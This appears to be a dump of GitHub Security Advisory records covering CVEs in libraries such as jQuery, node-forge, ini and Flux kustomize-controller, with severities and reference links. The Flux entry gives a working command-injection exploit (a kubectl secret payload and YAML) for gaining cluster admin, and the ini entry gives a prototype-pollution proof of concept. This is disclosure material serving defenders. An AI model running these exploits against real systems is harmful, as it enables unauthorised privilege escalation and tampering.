### Impact Unserialization of untrusted data. ### Patches The issue has been patched and users of `Requests` 1.6.0, 1.6.1 and 1.7.0 should update to version 1.8.0. ### References Publications about the vulnerability: * https://dannewitz.ninja/posts/php-unserialize-object-injection-yet-another-stars-rating-wordpress * https://github.com/ambionics/phpggc/issues/52 * https://blog.detectify.com/2019/07/23/improving-wordpress-plugin-security/ * https://i.blackhat.com/us-18/Thu-August-9/us-18-Thomas-Its-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf * https://cdn2.hubspot.net/hubfs/3853213/us-18-Thomas-It%27s-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-....pdf * https://2018.zeronights.ru/wp-content/uploads/materials/9%20ZN2018%20WV%20-%20PHP%20unserialize.pdf * https://medium.com/@knownsec404team/extend-the-attack-surface-of-php-deserialization-vulnerability-via-phar-d6455c6a1066#3c0f Originally fixed in WordPress 5.5.2: * https://github.com/WordPress/wordpress-develop/commit/add6bedf3a53b647d0ebda2970057912d3cd79d3 * https://wordpress.org/news/2020/10/wordpress-5-5-2-security-and-maintenance-release/ Related Security Advisories: * https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-28032 * https://nvd.nist.gov/vuln/detail/CVE-2020-28032 Notification to the Requests repo including a fix in: * https://github.com/rmccue/Requests/pull/421 and * https://github.com/rmccue/Requests/pull/422 ### For more information If you have any questions or comments about this advisory: * Open an issue in [Request](https://github.com/WordPress/Requests/)
{'CVE-2021-29476'}
2022-04-19T19:02:47Z
2021-04-29T21:52:30Z
CRITICAL
9.8
{'CWE-502'}
{'https://github.com/ambionics/phpggc/issues/52', 'https://i.blackhat.com/us-18/Thu-August-9/us-18-Thomas-Its-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf', 'https://wordpress.org/news/2020/10/wordpress-5-5-2-security-and-maintenance-release/', 'https://github.com/WordPress/wordpress-develop/commit/add6bedf3a53b647d0ebda2970057912d3cd79d3', 'https://cdn2.hubspot.net/hubfs/3853213/us-18-Thomas-It%27s-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-....pdf', 'https://medium.com/@knownsec404team/extend-the-attack-surface-of-php-deserialization-vulnerability-via-phar-d6455c6a1066#3c0f', 'https://github.com/FriendsOfPHP/security-advisories/blob/master/rmccue/requests/CVE-2021-29476.yaml', 'https://2018.zeronights.ru/wp-content/uploads/materials/9%20ZN2018%20WV%20-%20PHP%20unserialize.pdf', 'https://dannewitz.ninja/posts/php-unserialize-object-injection-yet-another-stars-rating-wordpress', 'https://github.com/advisories/GHSA-52qp-jpq7-6c54', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29476', 'https://github.com/rmccue/Requests/pull/421', 'https://blog.detectify.com/2019/07/23/improving-wordpress-plugin-security/', 'https://github.com/WordPress/Requests/security/advisories/GHSA-52qp-jpq7-6c54'}
null
GHSA
GHSA-64q9-f38h-9mwx
Protection Mechanism Failure in Jenkins Doktor Plugin
Jenkins Doktor Plugin 0.4.1 and earlier implements functionality that allows agent processes to render files on the controller as Markdown or Asciidoc, and error messages allow attackers able to control agent processes to determine whether a file with a given name exists.
{'CVE-2022-25204'}
2022-03-01T21:12:05Z
2022-02-16T00:01:18Z
MODERATE
5.4
{'CWE-693'}
{'https://github.com/advisories/GHSA-64q9-f38h-9mwx', 'https://nvd.nist.gov/vuln/detail/CVE-2022-25204', 'https://www.jenkins.io/security/advisory/2022-02-15/#SECURITY-2548'}
null
GHSA
GHSA-g8q2-24jh-5hpc
High severity vulnerability that affects jquery-ui
Withdrawn, accidental duplicate publish. Cross-site scripting (XSS) vulnerability in jQuery UI before 1.12.0 might allow remote attackers to inject arbitrary web script or HTML via the closeText parameter of the dialog function.
null
2021-12-02T23:07:07Z
2018-07-27T14:47:52Z
HIGH
0
null
{'https://nvd.nist.gov/vuln/detail/CVE-2016-7103', 'https://github.com/advisories/GHSA-g8q2-24jh-5hpc'}
null
GHSA
GHSA-86r9-39j9-99wp
Elliptic Curve Key Disclosure in go-jose
go-jose before 1.0.4 suffers from an invalid curve attack for the ECDH-ES algorithm. When deriving a shared key using ECDH-ES for an encrypted message, go-jose neglected to check that the received public key on a message is on the same curve as the static private key of the receiver, thus making it vulnerable to an invalid curve attack.
{'CVE-2016-9121'}
2021-06-23T17:17:52Z
2021-06-23T17:17:52Z
CRITICAL
9.1
{'CWE-326'}
{'https://nvd.nist.gov/vuln/detail/CVE-2016-9121', 'https://www.openwall.com/lists/oss-security/2016/11/03/1', 'https://github.com/square/go-jose/commit/c7581939a3656bb65e89d64da0a52364a33d2507', 'https://github.com/advisories/GHSA-86r9-39j9-99wp', 'https://hackerone.com/reports/164590'}
null
GHSA
GHSA-h29f-7f56-j8wh
Moderate severity vulnerability that affects sinatra
An issue was discovered in rack-protection/lib/rack/protection/path_traversal.rb in Sinatra 2.x before 2.0.1 on Windows. Path traversal is possible via backslash characters.
{'CVE-2018-7212'}
2021-09-13T14:42:42Z
2018-02-20T19:23:20Z
MODERATE
5.3
{'CWE-22'}
{'https://github.com/sinatra/sinatra/commit/6ad721abcfe36334108dcdd05d046c361e1b7a9c', 'https://github.com/sinatra/sinatra/pull/1379', 'https://github.com/advisories/GHSA-h29f-7f56-j8wh', 'https://nvd.nist.gov/vuln/detail/CVE-2018-7212'}
null
GHSA
GHSA-365p-96qv-xr7g
ASP.NET Core allow an elevation of privilege
ASP.NET Core 1.0. 1.1, and 2.0 allow an elevation of privilege vulnerability due to how web applications that are created from templates validate web requests, aka "ASP.NET Core Elevation Of Privilege Vulnerability".
{'CVE-2018-0787'}
2022-04-26T19:06:31Z
2018-10-16T19:56:59Z
HIGH
8.8
{'CWE-640'}
{'https://github.com/advisories/GHSA-365p-96qv-xr7g', 'https://github.com/aspnet/Announcements/issues/295', 'http://www.securityfocus.com/bid/103282', 'http://www.securitytracker.com/id/1040525', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0787', 'https://nvd.nist.gov/vuln/detail/CVE-2018-0787'}
null
GHSA
GHSA-cmhx-cq75-c4mj
Regular Expression Denial of Service (ReDoS)
A denial of service vulnerability exists when .NET Framework and .NET Core improperly process RegEx strings, aka '.NET Framework and .NET Core Denial of Service Vulnerability'. This CVE ID is unique from CVE-2019-0980, CVE-2019-0981.
{'CVE-2019-0820'}
2021-08-04T21:03:46Z
2021-08-04T21:03:46Z
MODERATE
7.5
{'CWE-400'}
{'https://access.redhat.com/errata/RHSA-2019:1259', 'https://github.com/advisories/GHSA-cmhx-cq75-c4mj', 'https://nvd.nist.gov/vuln/detail/CVE-2019-0820', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0820'}
null
GHSA
GHSA-35rf-v2jv-gfg7
Privilege escalation to cluster admin on multi-tenant environments
Users that can create Kubernetes Secrets, Service Accounts and Flux Kustomization objects, could execute commands inside the kustomize-controller container by embedding a shell script in a Kubernetes Secret. This can be used to run `kubectl` commands under the Service Account of kustomize-controller, thus allowing an authenticated Kubernetes user to gain cluster admin privileges. ### Impact Multitenant environments where non-admin users have permissions to create Flux Kustomization objects are affected by this issue. ### Exploit To exploit the command injection, first we create a secret with a shell command: ```sh kubectl create secret generic exploit-token --from-literal=token=" || kubectl api-versions" ``` Then we create a Service Account that refers to the above Secret: ```yaml apiVersion: v1 kind: ServiceAccount metadata: name: exploit namespace: default automountServiceAccountToken: false secrets: - name: exploit-token ``` And finally a Kustomization that runs under the above Service Account: ```yaml apiVersion: kustomize.toolkit.fluxcd.io/v1beta1 kind: Kustomization metadata: name: exploit namespace: default spec: interval: 5m path: "./deploy/" sourceRef: kind: GitRepository name: app serviceAccountName: exploit ``` When kustomize-controller reconciles the above Kustomization, it will execute the shell command from the secret. ### Patches This vulnerability was fixed in kustomize-controller v0.15.0 (included in flux2 v0.18.0) released on 2021-10-08. Starting with v0.15, the kustomize-controller no longer executes shell commands on the container OS and the `kubectl` binary has been removed from the container image. ### Workarounds To prevent the creation of Kubernetes Service Accounts with `secrets` in namespaces owned by tenants, a Kubernetes validation webhook such as Gatekeeper OPA or Kyverno can be used. ```yaml apiVersion: kyverno.io/v1 kind: ClusterPolicy metadata: name: restrict-sa spec: validationFailureAction: enforce background: false rules: - name: validate-sa match: resources: kinds: - ServiceAccount namespaces: - tenant1 - tenant2 subjects: - kind: User name: some@tenant1.com - kind: User name: some@tenant2.com - kind: ServiceAccount name: kustomize-controller namespace: flux-system - kind: ServiceAccount name: helm-controller namespace: flux-system validate: message: "Invalid service account" pattern: X(secrets): "*?" ``` ### References Disclosed by ADA Logics in a security audit of the Flux project sponsored by CNCF and facilitated by OSTIF. ### For more information If you have any questions or comments about this advisory: * Open an issue in [kustomize-controller repository](http://github.com/fluxcd/kustomize-controller)
{'CVE-2021-41254'}
2022-04-19T19:03:11Z
2021-11-15T17:35:33Z
HIGH
8.8
{'CWE-78'}
{'https://github.com/fluxcd/kustomize-controller/security/advisories/GHSA-35rf-v2jv-gfg7', 'https://github.com/advisories/GHSA-35rf-v2jv-gfg7', 'https://nvd.nist.gov/vuln/detail/CVE-2021-41254'}
null
GHSA
GHSA-g5gj-9ggf-9vmq
Infinite certificate chain depth results in OctoRPKI running forever
OctoRPKI does not limit the depth of a certificate chain, allowing for a CA to create children in an ad-hoc fashion, thereby making tree traversal never end. ## Patches ## For more information If you have any questions or comments about this advisory email us at security@cloudflare.com
{'CVE-2021-3908'}
2022-01-13T18:25:30Z
2021-11-10T20:38:53Z
MODERATE
5.9
{'CWE-400'}
{'https://github.com/cloudflare/cfrpki/security/advisories/GHSA-g5gj-9ggf-9vmq', 'https://www.debian.org/security/2022/dsa-5041', 'https://nvd.nist.gov/vuln/detail/CVE-2021-3908', 'https://github.com/advisories/GHSA-g5gj-9ggf-9vmq', 'https://github.com/cloudflare/cfrpki/releases/tag/v1.4.0'}
null
GHSA
GHSA-pq4w-qm9g-qx68
Insufficient Nonce Validation in Eclipse Milo Client
### Impact Credential replay affecting those connected to a server when *all 3* of the following conditions are met: - `SecurityPolicy` is `None` - using username/password or X509-based authentication - the server has a defect causing it to send null/empty or zeroed nonces ### Patches The problem has been patched in version `0.3.6`. A more relaxed treatment of validation as agreed upon by the OPC UA Security Working Group is implemented in version `0.3.7`. ### Workarounds Do not use username/password or X509-based authentication with `SecurityPolicy` of `None`. ### References https://opcfoundation.org/SecurityBulletins/OPC%20Foundation%20Security%20Bulletin%20CVE-2019-19135.pdf ### For more information If you have any questions or comments about this advisory: * Open an issue at [https://github.com/eclipse/milo/issues](https://github.com/eclipse/milo/issues) * Email [the mailing list](mailto:milo-dev@eclipse.org)
{'CVE-2019-19135'}
2021-07-28T18:54:54Z
2020-03-16T22:46:50Z
HIGH
7.4
{'CWE-330', 'CWE-522'}
{'https://opcfoundation.org/SecurityBulletins/OPC%20Foundation%20Security%20Bulletin%20CVE-2019-19135.pdf', 'https://nvd.nist.gov/vuln/detail/CVE-2019-19135', 'https://github.com/eclipse/milo/commit/cac0e710bf2b8bed9c602fc597e9de1d8903abed', 'https://github.com/advisories/GHSA-pq4w-qm9g-qx68', 'https://github.com/eclipse/milo/security/advisories/GHSA-pq4w-qm9g-qx68', 'https://opcfoundation.org/security-bulletins/'}
null
GHSA
GHSA-cfm4-qjh2-4765
Improper Verification of Cryptographic Signature in node-forge
### Impact RSA PKCS#1 v1.5 signature verification code is lenient in checking the digest algorithm structure. This can allow a crafted structure that steals padding bytes and uses unchecked portion of the PKCS#1 encoded message to forge a signature when a low public exponent is being used. ### Patches The issue has been addressed in `node-forge` `1.3.0`. ### References For more information, please see ["Bleichenbacher's RSA signature forgery based on implementation error"](https://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE/) by Hal Finney. ### For more information If you have any questions or comments about this advisory: * Open an issue in [forge](https://github.com/digitalbazaar/forge) * Email us at [example email address](mailto:security@digitalbazaar.com)
{'CVE-2022-24771'}
2022-03-22T19:33:47Z
2022-03-18T23:09:54Z
HIGH
7.5
{'CWE-347'}
{'https://github.com/digitalbazaar/forge/commit/bb822c02df0b61211836472e29b9790cc541cdb2', 'https://github.com/digitalbazaar/forge/security/advisories/GHSA-cfm4-qjh2-4765', 'https://github.com/digitalbazaar/forge/commit/3f0b49a0573ef1bb7af7f5673c0cfebf00424df1', 'https://nvd.nist.gov/vuln/detail/CVE-2022-24771', 'https://github.com/advisories/GHSA-cfm4-qjh2-4765'}
null
GHSA
GHSA-jpcq-cgw6-v4j6
Potential XSS vulnerability in jQuery
### Impact Passing HTML containing `<option>` elements from untrusted sources - even after sanitizing them - to one of jQuery's DOM manipulation methods (i.e. `.html()`, `.append()`, and others) may execute untrusted code. ### Patches This problem is patched in jQuery 3.5.0. ### Workarounds To workaround this issue without upgrading, use [DOMPurify](https://github.com/cure53/DOMPurify) with its `SAFE_FOR_JQUERY` option to sanitize the HTML string before passing it to a jQuery method. ### References https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/ ### For more information If you have any questions or comments about this advisory, search for a relevant issue in [the jQuery repo](https://github.com/jquery/jquery/issues). If you don't find an answer, open a new issue.
{'CVE-2020-11023'}
2022-04-25T23:06:58Z
2020-04-29T22:19:14Z
MODERATE
6.9
{'CWE-79'}
{'https://lists.apache.org/thread.html/rab82dd040f302018c85bd07d33f5604113573514895ada523c3401d9@%3Ccommits.hive.apache.org%3E', 'https://github.com/jquery/jquery/security/advisories/GHSA-jpcq-cgw6-v4j6', 'https://lists.apache.org/thread.html/r6c4df3b33e625a44471009a172dabe6865faec8d8f21cac2303463b1@%3Cissues.hive.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2020-11023', 'https://www.oracle.com/security-alerts/cpujan2021.html', 'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SAPQVX3XDNPGFT26QAQ6AJIXZZBZ4CD4/', 'https://lists.apache.org/thread.html/r2c85121a47442036c7f8353a3724aa04f8ecdfda1819d311ba4f5330@%3Cdev.felix.apache.org%3E', 'https://security.netapp.com/advisory/ntap-20200511-0006/', 'https://www.debian.org/security/2020/dsa-4693', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QPN2L2XVQGUA2V5HNQJWHK3APSK3VN7K/', 'https://lists.apache.org/thread.html/r094f435595582f6b5b24b66fedf80543aa8b1d57a3688fbcc21f06ec@%3Cissues.hive.apache.org%3E', 'https://lists.apache.org/thread.html/radcb2aa874a79647789f3563fcbbceaf1045a029ee8806b59812a8ea@%3Cissues.hive.apache.org%3E', 'https://lists.apache.org/thread.html/r9e0bd31b7da9e7403478d22652b8760c946861f8ebd7bd750844898e@%3Cdev.felix.apache.org%3E', 'https://lists.apache.org/thread.html/r0593393ca1e97b1e7e098fe69d414d6bd0a467148e9138d07e86ebbb@%3Cissues.hive.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'https://lists.apache.org/thread.html/ra32c7103ded9041c7c1cb8c12c8d125a6b2f3f3270e2937ef8417fac@%3Cgitbox.hive.apache.org%3E', 'https://lists.apache.org/thread.html/r49ce4243b4738dd763caeb27fa8ad6afb426ae3e8c011ff00b8b1f48@%3Cissues.flink.apache.org%3E', 'https://lists.apache.org/thread.html/r564585d97bc069137e64f521e68ba490c7c9c5b342df5d73c49a0760@%3Cissues.flink.apache.org%3E', 'http://packetstormsecurity.com/files/162160/jQuery-1.0.3-Cross-Site-Scripting.html', 'https://lists.apache.org/thread.html/re4ae96fa5c1a2fe71ccbb7b7ac1538bd0cb677be270a2bf6e2f8d108@%3Cissues.flink.apache.org%3E', 'https://www.oracle.com/security-alerts/cpujul2020.html', 'https://lists.apache.org/thread.html/r9c5fda81e4bca8daee305b4c03283dddb383ab8428a151d4cb0b3b15@%3Cissues.hive.apache.org%3E', 'https://lists.apache.org/thread.html/rd38b4185a797b324c8dd940d9213cf99fcdc2dbf1fc5a63ba7dee8c9@%3Cissues.hive.apache.org%3E', 'https://lists.apache.org/thread.html/r54565a8f025c7c4f305355fdfd75b68eca442eebdb5f31c2e7d977ae@%3Cissues.flink.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://lists.apache.org/thread.html/r55f5e066cc7301e3630ce90bbbf8d28c82212ae1f2d4871012141494@%3Cdev.felix.apache.org%3E', 'https://www.tenable.com/security/tns-2021-02', 'https://lists.apache.org/thread.html/r8f70b0f65d6bedf316ecd899371fd89e65333bc988f6326d2956735c@%3Cissues.flink.apache.org%3E', 'https://lists.apache.org/thread.html/r07ab379471fb15644bf7a92e4a98cbc7df3cf4e736abae0cc7625fe6@%3Cdev.felix.apache.org%3E', 'https://www.drupal.org/sa-core-2020-002', 'https://lists.apache.org/thread.html/rb25c3bc7418ae75cba07988dafe1b6912f76a9dd7d94757878320d61@%3Cgitbox.hive.apache.org%3E', 'https://lists.apache.org/thread.html/rda99599896c3667f2cc9e9d34c7b6ef5d2bbed1f4801e1d75a2b0679@%3Ccommits.nifi.apache.org%3E', 'https://lists.apache.org/thread.html/r3702ede0ff83a29ba3eb418f6f11c473d6e3736baba981a8dbd9c9ef@%3Cdev.felix.apache.org%3E', 'https://lists.apache.org/thread.html/r4dba67be3239b34861f1b9cfdf9dfb3a90272585dcce374112ed6e16@%3Cdev.felix.apache.org%3E', 'https://lists.apache.org/thread.html/ree3bd8ddb23df5fa4e372d11c226830ea3650056b1059f3965b3fce2@%3Cissues.flink.apache.org%3E', 'https://www.oracle.com/security-alerts/cpujan2022.html', 'https://www.tenable.com/security/tns-2021-10', 'https://lists.apache.org/thread.html/rede9cfaa756e050a3d83045008f84a62802fc68c17f2b4eabeaae5e4@%3Cissues.flink.apache.org%3E', 'https://lists.apache.org/thread.html/ra406b3adfcffcb5ce8707013bdb7c35e3ffc2776a8a99022f15274c6@%3Cissues.hive.apache.org%3E', 'https://lists.apache.org/thread.html/r1fed19c860a0d470f2a3eded12795772c8651ff583ef951ddac4918c@%3Cgitbox.hive.apache.org%3E', 'http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00067.html', 'https://lists.apache.org/thread.html/rf1ba79e564fe7efc56aef7c986106f1cf67a3427d08e997e088e7a93@%3Cgitbox.hive.apache.org%3E', 'https://lists.debian.org/debian-lts-announce/2021/03/msg00033.html', 'https://blog.jquery.com/2020/04/10/jquery-3-5-0-released', 'https://lists.apache.org/thread.html/rb69b7d8217c1a6a2100247a5d06ce610836b31e3f5d73fc113ded8e7@%3Cissues.hive.apache.org%3E', 'https://lists.apache.org/thread.html/rf661a90a15da8da5922ba6127b3f5f8194d4ebec8855d60a0dd13248@%3Cdev.hive.apache.org%3E', 'https://lists.apache.org/thread.html/r6e97b37963926f6059ecc1e417721608723a807a76af41d4e9dbed49@%3Cissues.hive.apache.org%3E', 'https://lists.apache.org/thread.html/r706cfbc098420f7113968cc377247ec3d1439bce42e679c11c609e2d@%3Cissues.flink.apache.org%3E', 'https://github.com/jquery/jquery/releases/tag/3.5.0', 'https://lists.apache.org/thread.html/ra3c9219fcb0b289e18e9ec5a5ebeaa5c17d6b79a201667675af6721c@%3Cgitbox.hive.apache.org%3E', 'https://lists.apache.org/thread.html/rf0f8939596081d84be1ae6a91d6248b96a02d8388898c372ac807817@%3Cdev.felix.apache.org%3E', 'http://lists.opensuse.org/opensuse-security-announce/2020-11/msg00039.html', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SFP4UK4EGP4AFH2MWYJ5A5Z4I7XVFQ6B/', 'https://www.oracle.com/security-alerts/cpuoct2020.html', 'https://github.com/advisories/GHSA-jpcq-cgw6-v4j6', 'http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00085.html', 'https://lists.apache.org/thread.html/r0483ba0072783c2e1bfea613984bfb3c86e73ba8879d780dc1cc7d36@%3Cissues.flink.apache.org%3E', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AVKYXLWCLZBV2N7M46KYK4LVA5OXWPBY/', 'https://lists.apache.org/thread.html/r9006ad2abf81d02a0ef2126bab5177987e59095b7194a487c4ea247c@%3Ccommits.felix.apache.org%3E', 'https://lists.apache.org/thread.html/ra374bb0299b4aa3e04edde01ebc03ed6f90cf614dad40dd428ce8f72@%3Cgitbox.hive.apache.org%3E', 'https://lists.apache.org/thread.html/r4aadb98086ca72ed75391f54167522d91489a0d0ae25b12baa8fc7c5@%3Cissues.hive.apache.org%3E', 'https://lists.apache.org/thread.html/rbb448222ba62c430e21e13f940be4cb5cfc373cd3bce56b48c0ffa67@%3Cdev.flink.apache.org%3E', 'https://jquery.com/upgrade-guide/3.5/', 'https://security.gentoo.org/glsa/202007-03', 'https://www.oracle.com//security-alerts/cpujul2021.html'}
null
GHSA
GHSA-q66c-h853-gqw2
AMQP 0-8, 0-9, 0-91, and 0-10 connection handling in Apache Qpid Java before 6.0.3 might allow remote attackers to bypass authentication
The AMQP 0-8, 0-9, 0-91, and 0-10 connection handling in Apache Qpid Java before 6.0.3 might allow remote attackers to bypass authentication and consequently perform actions via vectors related to connection state logging.
{'CVE-2016-4432'}
2022-04-26T19:03:55Z
2018-10-16T19:49:48Z
CRITICAL
9.1
{'CWE-287'}
{'https://github.com/advisories/GHSA-q66c-h853-gqw2', 'https://svn.apache.org/viewvc?view=revision&revision=1743393', 'https://issues.apache.org/jira/browse/QPID-7257', 'http://mail-archives.apache.org/mod_mbox/qpid-users/201605.mbox/%3CCAFEMS4tXDKYxKVMmU0zTb_7uzduoUS4_RePnUwz1tj%2BGQLNw5Q%40mail.gmail.com%3E', 'https://svn.apache.org/viewvc?view=revision&revision=1743161', 'http://www.securitytracker.com/id/1035983', 'https://nvd.nist.gov/vuln/detail/CVE-2016-4432', 'http://www.securityfocus.com/archive/1/538508/100/0/threaded', 'http://packetstormsecurity.com/files/137216/Apache-Qpid-Java-Broker-6.0.2-Authentication-Bypass.html'}
null
GHSA
GHSA-4g4c-8gqh-m4vm
Inclusion of Functionality from Untrusted Control Sphere in Ruby
The paranoid2 gem 1.1.6 for Ruby, as distributed on RubyGems.org, included a code-execution backdoor inserted by a third party. The current version, without this backdoor, is 1.1.5.
{'CVE-2019-13589'}
2021-05-10T22:18:29Z
2019-07-16T00:41:55Z
CRITICAL
9.8
{'CWE-829'}
{'http://www.securityfocus.com/bid/109281', 'https://rubygems.org/gems/paranoid2/versions', 'https://nvd.nist.gov/vuln/detail/CVE-2019-13589', 'https://snyk.io/vuln/SNYK-RUBY-PARANOID2-451600', 'https://github.com/rubygems/rubygems.org/issues/2051', 'https://github.com/advisories/GHSA-4g4c-8gqh-m4vm'}
null
GHSA
GHSA-p692-7mm3-3fxg
actionpack is vulnerable to remote bypass authentication
The http_basic_authenticate_with method in actionpack/lib/action_controller/metal/http_authentication.rb in the Basic Authentication implementation in Action Controller in Ruby on Rails before 3.2.22.1, 4.0.x and 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x before 5.0.0.beta1.1 does not use a constant-time algorithm for verifying credentials, which makes it easier for remote attackers to bypass authentication by measuring timing differences.
{'CVE-2015-7576'}
2022-04-25T20:52:40Z
2017-10-24T18:33:36Z
LOW
3.7
null
{'http://www.openwall.com/lists/oss-security/2016/01/25/8', 'http://www.securityfocus.com/bid/81803', 'http://lists.fedoraproject.org/pipermail/package-announce/2016-February/178067.html', 'http://rhn.redhat.com/errata/RHSA-2016-0296.html', 'http://www.securitytracker.com/id/1034816', 'http://lists.fedoraproject.org/pipermail/package-announce/2016-February/178043.html', 'http://lists.fedoraproject.org/pipermail/package-announce/2016-February/178047.html', 'http://www.debian.org/security/2016/dsa-3464', 'https://nvd.nist.gov/vuln/detail/CVE-2015-7576', 'http://lists.fedoraproject.org/pipermail/package-announce/2016-February/178068.html', 'http://lists.opensuse.org/opensuse-updates/2016-02/msg00034.html', 'http://lists.opensuse.org/opensuse-updates/2016-02/msg00043.html', 'http://lists.opensuse.org/opensuse-security-announce/2016-04/msg00053.html', 'https://groups.google.com/forum/message/raw?msg=ruby-security-ann/ANv0HDHEC3k/T8Hgq-hYEgAJ', 'https://github.com/advisories/GHSA-p692-7mm3-3fxg'}
null
GHSA
GHSA-g4cp-h53p-v3v8
Allocation of Resources Without Limits or Throttling in Undertow
A flaw was discovered in Undertow in versions before Undertow 2.1.1.Final where certain requests to the "Expect: 100-continue" header may cause an out of memory error. This flaw may potentially lead to a denial of service.
{'CVE-2020-10705'}
2022-02-11T21:12:34Z
2021-04-30T17:28:42Z
HIGH
7.5
{'CWE-770'}
{'https://bugzilla.redhat.com/show_bug.cgi?id=1803241', 'https://nvd.nist.gov/vuln/detail/CVE-2020-10705', 'https://security.netapp.com/advisory/ntap-20220210-0014/', 'https://github.com/advisories/GHSA-g4cp-h53p-v3v8'}
null
GHSA
GHSA-x6m6-5hrf-fh6r
Denial of Service in markdown-it-toc-and-anchor
All versions of `markdown-it-toc-and-anchor` are vulnerable to Denial of Service. Parsing markdown containing `**text**+\n@[toc]` causes the application to enter and infinite loop. ## Recommendation No fix is currently available. Consider using an alternative module until a fix is made available.
null
2021-09-24T22:12:15Z
2020-09-01T21:26:50Z
HIGH
7.5
{'CWE-400'}
{'https://github.com/medfreeman/markdown-it-toc-and-anchor', 'https://www.npmjs.com/advisories/749', 'https://snyk.io/vuln/SNYK-JS-MARKDOWNITTOCANDANCHOR-73500', 'https://github.com/advisories/GHSA-x6m6-5hrf-fh6r'}
null
GHSA
GHSA-vj3f-3286-r4pf
Path Traversal in Docker
Path traversal vulnerability in Docker before 1.3.3 allows remote attackers to write to arbitrary files and bypass a container protection mechanism via a full pathname in a symlink in an (1) image or (2) build in a Dockerfile.
{'CVE-2014-9356'}
2022-04-19T19:03:27Z
2021-05-18T21:09:17Z
HIGH
5.9
{'CWE-22'}
{'https://access.redhat.com/security/cve/cve-2014-9356', 'http://www.securityfocus.com/archive/1/archive/1/534215/100/0/threaded', 'https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9356', 'https://github.com/advisories/GHSA-vj3f-3286-r4pf', 'https://bugzilla.redhat.com/show_bug.cgi?id=1172761', 'https://nvd.nist.gov/vuln/detail/CVE-2014-9356', 'https://groups.google.com/forum/#%21msg/docker-user/nFAz-B-n4Bw/0wr3wvLsnUwJ'}
null
GHSA
GHSA-vq23-5h4f-vwpv
Update unsound DrainFilter and RString::retain
An issue was discovered in the abi_stable crate before 0.9.1 for Rust. DrainFilter lacks soundness because of a double drop.
{'CVE-2020-36212'}
2021-08-25T21:01:35Z
2021-08-25T21:01:35Z
HIGH
0
{'CWE-672'}
{'https://github.com/rodrimati1992/abi_stable_crates/issues/44', 'https://github.com/advisories/GHSA-vq23-5h4f-vwpv', 'https://rustsec.org/advisories/RUSTSEC-2020-0105.html', 'https://nvd.nist.gov/vuln/detail/CVE-2020-36212'}
null
GHSA
GHSA-qqgx-2p2h-9c37
Prototype Pollution
### Overview The `ini` npm package before version 1.3.6 has a Prototype Pollution vulnerability. If an attacker submits a malicious INI file to an application that parses it with `ini.parse`, they will pollute the prototype on the application. This can be exploited further depending on the context. ### Patches This has been patched in 1.3.6 ### Steps to reproduce payload.ini ``` [__proto__] polluted = "polluted" ``` poc.js: ``` var fs = require('fs') var ini = require('ini') var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8')) console.log(parsed) console.log(parsed.__proto__) console.log(polluted) ``` ``` > node poc.js {} { polluted: 'polluted' } { polluted: 'polluted' } polluted ```
{'CVE-2020-7788'}
2021-07-28T21:12:38Z
2020-12-10T16:53:45Z
HIGH
7.3
{'CWE-1321'}
{'https://www.npmjs.com/advisories/1589', 'https://github.com/npm/ini/commit/56d2805e07ccd94e2ba0984ac9240ff02d44b6f1', 'https://github.com/advisories/GHSA-qqgx-2p2h-9c37', 'https://lists.debian.org/debian-lts-announce/2020/12/msg00032.html', 'https://snyk.io/vuln/SNYK-JS-INI-1048974', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7788'}
null
GHSA
GHSA-m7h5-fjjq-559f
SQL Injection in topthink/thinkphp
ThinkPHP v3.2.3 and below contains a SQL injection vulnerability which is triggered when the array is not passed to the "where" and "query" methods.
{'CVE-2020-20120'}
2021-10-07T13:56:42Z
2021-09-30T17:11:11Z
CRITICAL
9.8
{'CWE-89'}
{'https://nvd.nist.gov/vuln/detail/CVE-2020-20120', 'https://github.com/advisories/GHSA-m7h5-fjjq-559f', 'https://github.com/top-think/thinkphp/issues/553'}
null
GHSA
GHSA-mc8v-mgrf-8f4m
Clarify Content-Type handling
### Impact In the OCI Distribution Specification version 1.0.0 and prior, the Content-Type header alone was used to determine the type of document during push and pull operations. Documents that contain both “manifests” and “layers” fields could be interpreted as either a manifest or an index in the absence of an accompanying Content-Type header. If a Content-Type header changed between two pulls of the same digest, a client may interpret the resulting content differently. ### Patches The OCI Distribution Specification will be updated to require that a `mediaType` value present in a manifest or index match the Content-Type header used during the push and pull operations. ### Workarounds Clients pulling from a registry may distrust the Content-Type header and reject an ambiguous document that contains both “manifests” and “layers” fields or “manifests” and “config” fields. ### References https://github.com/opencontainers/image-spec/security/advisories/GHSA-77vh-xpmg-72qh ### For more information If you have any questions or comments about this advisory: * Open an issue in https://github.com/opencontainers/distribution-spec/ * Email us at security@opencontainers.org
{'CVE-2021-41190'}
2022-04-19T19:03:13Z
2021-11-18T16:13:08Z
LOW
3
{'CWE-843'}
